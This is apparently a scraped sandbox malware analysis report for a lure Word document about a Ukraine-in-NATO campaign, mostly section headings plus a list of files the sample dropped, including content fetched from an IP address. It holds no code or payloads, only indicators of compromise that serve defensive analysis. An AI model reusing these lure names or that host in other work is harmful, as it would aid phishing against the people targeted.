Data Sources:	File monitoring, Netflow/Enclave netflow, Network protocol analysis, Packet capture, Process command-line parameters, Process monitoring, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report Overview_of_UWCs_UkraineInNATO_campaign.docx.doc

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Configuration

Yara Signatures

Initial Sample

Dropped Files

Sigma Signatures

Snort Signatures

Joe Sandbox Signatures

Compliance

Software Vulnerabilities

Networking

System Summary

Hooking and other Techniques for Hiding and Protection

Stealing of Sensitive Information

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

World Map of Contacted IPs

Public IPs

General Information

Warnings

Simulations

Behavior and APIs

Created / dropped Files

C:\Users\user\AppData\Local\Microsoft\Office\14.0\OfficeFileCache\FSD-CNRY.FSD

C:\Users\user\AppData\Local\Microsoft\Office\14.0\OfficeFileCache\FSD-{69A43BD0-59CA-4096-A289-DE6006A14492}.FSD

C:\Users\user\AppData\Local\Microsoft\Office\14.0\OfficeFileCache\FSF-CTBL.FSF

C:\Users\user\AppData\Local\Microsoft\Office\14.0\OfficeFileCache\LocalCacheFileEditManager\FSD-CNRY.FSD

C:\Users\user\AppData\Local\Microsoft\Office\14.0\OfficeFileCache\LocalCacheFileEditManager\FSD-{C8AD303A-D920-41B8-AD68-D547D1AB80FD}.FSD

C:\Users\user\AppData\Local\Microsoft\Office\14.0\OfficeFileCache\LocalCacheFileEditManager\FSF-{0E1EEE64-E8C6-4E2A-9759-63CF07FD8988}.FSF

C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\5JC0A1KN\RFile[1].htm

C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\5JC0A1KN\zip_k3[1].htm

C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\A1ALYMN5

C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\XNHC0JWC\zip_k2[1].htm

C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\start[1].xml

C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\zip_k[1].htm

C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\714CDA5E.png

C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\F2940191.url

C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\F2940191.url:Zone.Identifier

C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRF{66724ADB-9929-43E8-BB9C-9B934837700D}.tmp

C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRS{C7C2C44C-1140-4E43-A415-F39DE2B8E989}.tmp

C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRS{E91871FC-BFD2-4C90-871A-4BA39F60B253}.tmp

C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRS{F6E701FB-5C4F-4237-8934-5D6E6D5988D5}.tmp

C:\Users\user\AppData\Local\Temp\Temp1_84.17.52.5_bc8d1_file001.zip\1111.txt

C:\Users\user\AppData\Local\Temp\Temp1_84.17.52.5_bc8d1_file001.zip\1111.txt:Zone.Identifier

C:\Users\user\AppData\Local\Temp\msoE39.tmp

C:\Users\user\AppData\Local\Temp\{A1086441-2541-4563-A805-403B727CE9BF}

C:\Users\user\AppData\Local\Temp\{B221F3E1-BBD5-498C-8D01-9802449BFE1E}

C:\Users\user\AppData\Local\Temp\~DF0933009CB7A48061.TMP

C:\Users\user\AppData\Local\Temp\~DF242FA8E3B8CD150B.TMP

C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\Overview_of_UWCs_UkraineInNATO_campaign.docx.LNK

C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\file001.url

C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\file001.url:Zone.Identifier

C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\index.dat

C:\Users\user\AppData\Roaming\Microsoft\Templates\~$Normal.dotm

C:\Users\user\Desktop\~$erview_of_UWCs_UkraineInNATO_campaign.docx.doc

Windows Analysis Report
Overview_of_UWCs_UkraineInNATO_campaign.docx.doc